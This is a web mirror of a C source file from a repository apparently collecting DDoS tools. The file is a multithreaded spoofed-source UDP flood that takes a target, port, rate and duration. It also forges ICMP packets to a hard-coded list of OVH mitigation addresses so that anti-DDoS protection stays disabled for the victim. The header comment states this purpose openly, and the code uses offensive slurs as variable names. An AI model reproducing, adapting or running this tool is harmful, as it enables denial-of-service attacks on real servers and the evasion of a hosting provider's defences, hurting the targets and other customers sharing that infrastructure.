Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/L4/UDP/vacudp.c
4607 views
1
/* 

2


3
poc of disabling vac for ovh made by googleadmin -- downing ovh's spoofed

4
so ovh checks your server per icmp if its down or not, if we fake icmp packets from our target to ovh's vac the server will stay unprotected, yep

5


6


7
16.08.2021 // dd.mm.yyyy , last checked might be fixed

8
*/

9


10
#include <unistd.h>

11
#include <time.h>

12
#include <sys/types.h>

13
#include <sys/socket.h>

14
#include <sys/ioctl.h>

15
#include <string.h>

16
#include <stdlib.h>

17
#include <stdio.h>

18
#include <pthread.h>

19
#include <netinet/udp.h>

20
#include <netinet/ip.h>

21
#include <netinet/in.h>

22
#include <netinet/if_ether.h>

23
#include <netdb.h>

24
#include <net/if.h>

25
#include <arpa/inet.h>

26
#define MAX_PACKET_SIZE 4096

27
#define PHI 0x9e3779b9

28
static unsigned long int Q[4096], c = 362436;

29
static unsigned int floodport;

30
volatile int limiter;

31
volatile unsigned int pps;

32
volatile unsigned int sleeptime = 100;

33
void init_rand(unsigned long int x)

34
{

35
        int i;

36
        Q[0] = x;

37
        Q[1] = x + PHI;

38
        Q[2] = x + PHI + PHI;

39
        for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }

40
}

41
unsigned long int rand_cmwc(void)

42
{

43
        unsigned long long int t, a = 18782LL;

44
        static unsigned long int i = 4095;

45
        unsigned long int x, r = 0xfffffffe;

46
        i = (i + 1) & 4095;

47
        t = a * Q[i] + c;

48
        c = (t >> 32);

49
        x = t + c;

50
        if (x < c) {

51
        x++;

52
        c++;

53
        }

54
        return (Q[i] = r - x);

55
}

56
int randnum(int min_num, int max_num)

57
{

58
    int result = 0, low_num = 0, hi_num = 0;

59


60
    if (min_num < max_num)

61
    {

62
        low_num = min_num;

63
        hi_num = max_num + 1;

64
    } else {

65
        low_num = max_num + 1;

66
        hi_num = min_num;

67
    }

68


69
    result = (rand_cmwc() % (hi_num - low_num)) + low_num;

70
    return result;

71
}

72
unsigned short csum (unsigned short *buf, int count)

73
{

74
        register unsigned long sum = 0;

75
        while( count > 1 ) { sum += *buf++; count -= 2; }

76
        if(count > 0) { sum += *(unsigned char *)buf; }

77
        while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }

78
        return (unsigned short)(~sum);

79
}

80
unsigned short int checksum(unsigned short int * addr, int len) {

81
  int nleft = len;

82
  int sum = 0;

83
  unsigned short int * w = addr;

84
  unsigned short int answer = 0;

85


86
  while (nleft > 1) {

87
    sum += * w++;

88
    nleft -= sizeof(unsigned short int);

89
  }

90


91
  if (nleft == 1) {

92
    *(unsigned char * )( & answer) = * (unsigned char * ) w;

93
    sum += answer;

94
  }

95


96
  sum = (sum >> 16) + (sum & 0xFFFF);

97
  sum += (sum >> 16);

98
  answer = ~sum;

99
  return (answer);

100
}

101
unsigned short int udp4_checksum(struct iphdr * iph, struct udphdr * udph, unsigned char * payload, int payloadlen) {

102
  char buf[IP_MAXPACKET];

103
  char * ptr;

104
  int chksumlen = 0;

105
  int i;

106


107
  ptr = & buf[0];

108


109
  memcpy(ptr, & iph -> saddr, sizeof(iph -> saddr));

110
  ptr += sizeof(iph -> saddr);

111
  chksumlen += sizeof(iph -> saddr);

112


113
  memcpy(ptr, & iph -> daddr, sizeof(iph -> daddr));

114
  ptr += sizeof(iph -> daddr);

115
  chksumlen += sizeof(iph -> daddr);

116


117
  * ptr = 0;

118
  ptr++;

119
  chksumlen += 1;

120


121
  memcpy(ptr, & iph -> protocol, sizeof(iph -> protocol));

122
  ptr += sizeof(iph -> protocol);

123
  chksumlen += sizeof(iph -> protocol);

124


125
  memcpy(ptr, & udph -> len, sizeof(udph -> len));

126
  ptr += sizeof(udph -> len);

127
  chksumlen += sizeof(udph -> len);

128


129
  memcpy(ptr, & udph -> source, sizeof(udph -> source));

130
  ptr += sizeof(udph -> source);

131
  chksumlen += sizeof(udph -> source);

132


133
  memcpy(ptr, & udph -> dest, sizeof(udph -> dest));

134
  ptr += sizeof(udph -> dest);

135
  chksumlen += sizeof(udph -> dest);

136


137
  memcpy(ptr, & udph -> len, sizeof(udph -> len));

138
  ptr += sizeof(udph -> len);

139
  chksumlen += sizeof(udph -> len);

140


141
  * ptr = 0;

142
  ptr++;

143
  * ptr = 0;

144
  ptr++;

145
  chksumlen += 2;

146


147
  memcpy(ptr, payload, payloadlen);

148
  ptr += payloadlen;

149
  chksumlen += payloadlen;

150


151
  for (i = 0; i < payloadlen % 2; i++, ptr++) {

152
    * ptr = 0;

153
    ptr++;

154
    chksumlen++;

155
  }

156


157
  return checksum((unsigned short int * ) buf, chksumlen);

158
}

159
void setup_ip_header(struct iphdr *iph)

160
{

161
        iph->ihl = 5;

162
        iph->version = 4;

163
        iph->tos = 0;

164
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr);

165
        iph->id = htonl(54321);

166
        iph->frag_off = 0;

167
        iph->ttl = 128;

168
        iph->protocol = IPPROTO_UDP;

169
        iph->check = 0;

170
        iph->saddr = inet_addr("192.168.3.100");

171
}

172
void setup_udp_header(struct udphdr *udph)

173
{

174
        udph->source = htons(5678);

175
        udph->check = 0;

176
        udph->len=htons(sizeof(struct udphdr));

177
}

178
struct icmphdr //we dont use ip_icmp.h because its literally ass

179
{

180
        uint8_t type;

181
        uint8_t code;

182
        uint16_t checksum;

183
        uint16_t ident;

184
        uint16_t seqs;

185
};

186
void setup_icmp_header(struct icmphdr *icmp)

187
{

188
        icmp->type = 0x08;

189
        icmp->code = 0;

190
        icmp->checksum = 0;

191
        icmp->ident = 0;

192
        icmp->seqs = 0;

193
}

194
char vacips[16][255] =

195
{

196
        "37.187.231.251",

197
        "151.80.231.244",

198
        "151.80.231.245",

199
        "151.80.231.246",

200
        "151.80.231.247",

201
        "213.186.33.62",

202
        "92.222.184.",//special ips innit bruv

203
        "92.222.185.",

204
        "92.222.186.",

205
        "167.114.37.",

206
        "213.186.45.4",

207
        "13.251.184.9",

208
        "37.59.0.235",

209
        "8.33.137.2",

210
        "213.186.33.13",

211
        "213.186.50.98"

212
};

213
void vac_disable(char *target)

214
{

215
        char packetcontainer[MAX_PACKET_SIZE];

216
        memset(packetcontainer, 0, MAX_PACKET_SIZE);

217


218
        struct iphdr *iphv2 = (struct iphdr *)packetcontainer;

219
        struct icmphdr *icmp = (void *)iphv2 + sizeof(struct iphdr);

220


221
        setup_ip_header(iphv2);

222
        setup_icmp_header(icmp);

223


224
        iphv2->saddr = inet_addr(target);

225
        iphv2->protocol = 1;

226
        iphv2->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr);

227


228
        struct sockaddr_in sin;

229
        sin.sin_family = AF_INET;

230
        sin.sin_port = htons(floodport);

231
        sin.sin_addr.s_addr = inet_addr(target);

232
        

233
        int vacsocket = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);

234
        if(vacsocket < 0){

235
                fprintf(stderr, "Could not open raw socket.\n");

236
                exit(-1);

237
        }

238


239
        int tmp = 1;

240
        const int *val = &tmp;

241
        if(setsockopt(vacsocket, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){

242
                fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

243
                exit(-1);

244
        }

245
        

246
        int cuntdestroyer;

247
        for(cuntdestroyer = 0; cuntdestroyer < 16; cuntdestroyer++){

248
                if(cuntdestroyer >= 6 && cuntdestroyer <= 9){

249
                        int rape24;

250
                        for(rape24 = 0; rape24 <= 255; rape24++){

251
                                char haxip[255];

252
                                sprintf(haxip, "%s%d", vacips[cuntdestroyer], rape24);

253
                                iphv2->daddr = inet_addr(haxip);

254
                                iphv2->check = csum ((unsigned short *) packetcontainer, iphv2->tot_len);

255
                                icmp->ident = randnum(0, 65534);

256
                                icmp->code = 0;

257
                                icmp->seqs = randnum(0, 65534);

258
                                icmp->checksum = csum ((unsigned short *) icmp, sizeof(icmp));

259
                                sendto(vacsocket, packetcontainer, iphv2->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

260
                        }

261
                } else {

262
                        iphv2->daddr = inet_addr(vacips[cuntdestroyer]);

263
                        iphv2->check = csum ((unsigned short *) packetcontainer, iphv2->tot_len);

264
                        icmp->ident = randnum(0, 65534);

265
                        icmp->code = 0;

266
                        icmp->seqs = randnum(0, 65534);

267
                        icmp->checksum = csum ((unsigned short *) icmp, sizeof(icmp));

268
                        sendto(vacsocket, packetcontainer, iphv2->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

269
                }

270
        }

271


272
}

273
void *flood(void *par1)

274
{

275
        char *td = (char *)par1;

276
        char datagram[MAX_PACKET_SIZE];

277
        struct iphdr *iph = (struct iphdr *)datagram;

278
        struct udphdr *udph = (void *)iph + sizeof(struct iphdr);

279
        struct sockaddr_in sin;

280
        sin.sin_family = AF_INET;

281
        sin.sin_port = htons(floodport);

282
        sin.sin_addr.s_addr = inet_addr(td);

283
        int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);

284
        if(s < 0){

285
        fprintf(stderr, "Could not open raw socket.\n");

286
        exit(-1);

287
        }

288
        memset(datagram, 0, MAX_PACKET_SIZE);

289
        setup_ip_header(iph);

290
        setup_udp_header(udph);

291
        udph->dest = htons(floodport);

292
        iph->daddr = sin.sin_addr.s_addr;

293
        iph->check = csum ((unsigned short *) datagram, iph->tot_len);

294
        int tmp = 1;

295
        const int *val = &tmp;

296
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){

297
        fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

298
        exit(-1);

299
        }

300
        init_rand(time(NULL));

301
        register unsigned int i;

302
        int packetcounter = 0;

303
        i = 0;

304
        while(1){

305
                if(packetcounter == 500){

306
                        vac_disable(td);

307
                        packetcounter = 0;

308
                } else {

309
                        packetcounter++;

310
                }

311
                udph->check = 0;

312
                udph->dest = htons(rand_cmwc() & 0xFFFF);

313
                udph->dest = htons(floodport);

314
                iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);

315
                iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

316
                iph->check = csum ((unsigned short *) datagram, iph->tot_len);

317
                udph->source = htons(rand_cmwc() & 0xFFFF);

318
                udph->source = htons(rand_cmwc() & 0xFFFF);

319
                udph->check = udp4_checksum(iph, udph, ppayload, 0);

320
                sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

321
                pps++;

322
                if(i >= limiter)

323
                {

324
                        i = 0;

325
                        usleep(sleeptime);

326
                }

327
                i++;

328
        }

329
}

330
int main(int argc, char *argv[ ])

331
{

332
        if(argc < 6){

333
        fprintf(stdout, "Usage: %s <target> <port> <threads> <pps, -1 = no limit> <time>\n", argv[0]);

334
        fprintf(stdout, "script made by googleadmin\n");

335
        exit(-1);

336
        }

337
        fprintf(stdout, "all parameters accepted, initiating flood.\n");

338
        int num_threads = atoi(argv[3]);

339
        floodport = atoi(argv[2]);

340
        int maxpps = atoi(argv[4]);

341
        limiter = 0;

342
        pps = 0;

343
        pthread_t thread[num_threads];

344
        int multiplier = 20;

345
        int i;

346
        for(i = 0;i<num_threads;i++){

347
        pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);

348
        }

349
        fprintf(stdout, "flood started...\n");

350
        for(i = 0;i<(atoi(argv[5])*multiplier);i++)

351
        {

352
        usleep((1000/multiplier)*1000);

353
        if((pps*multiplier) > maxpps)

354
        {

355
        if(1 > limiter)

356
        {

357
        sleeptime+=100;

358
        } else {

359
        limiter--;

360
        }

361
        } else {

362
        limiter++;

363
        if(sleeptime > 25)

364
        {

365
        sleeptime-=25;

366
        } else {

367
        sleeptime = 0;

368
        }

369
        }

370
        pps = 0;

371
        }

372
        return 0;

373
}

374